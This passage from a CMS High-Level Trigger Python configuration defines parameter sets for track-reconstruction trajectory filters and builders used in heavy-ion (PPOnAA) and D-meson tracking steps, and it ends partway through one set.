HLTPSetDetachedTripletStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( False ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPPixelPairStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterInOutForFullTrackingPPOnAA" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMixedTripletStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.4 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelLessStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelLessStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPPixelLessStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTobTecStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepInOutTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( False ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPTobTecStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepInOutTrajectoryFilterForFullTrackingPPOnAA" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetJetCoreStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetJetCoreStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 50 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelPairStepTrajectoryFilterInOutForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMixedTripletStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedTripletStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPMixedTripletStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedQuadStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedQuadStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedTripletStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedTripletStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterBasePreSplittingForDmesonPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
maxCCCLostHits = cms.int32( 0 ),
nSigmaMinPt = cms.double( 5.0 ),
minPt = cms.double( 3.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryFilterForDmesonPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
maxCCCLostHits = cms.int32( 0 ),
nSigmaMinPt = cms.double( 5.0 ),
minPt = cms.double( 3.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderForDmesonPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterForDmesonPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 1 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtQuadStepTrajectoryFilterForDmesonPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 2.8 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtQuadStepTrajectoryBuilderForDmesonPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilterForDmesonPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryFilterForDmesonPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 3.5 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetHighPtTripletStepTrajectoryBuilderForDmesonPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilterForDmesonPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterPreSplittingForDmesonPPOnAA = cms.PSet(
ComponentType = cms.string( "CompositeTrajectoryFilter" ),
filters = cms.VPSet(
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterBasePreSplittingForDmesonPPOnAA" ) ),
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterShapePreSplittingPPOnAA" ) )
)
)
HLTPSetInitialStepTrajectoryBuilderPreSplittingForDmesonPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterPreSplittingForDmesonPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
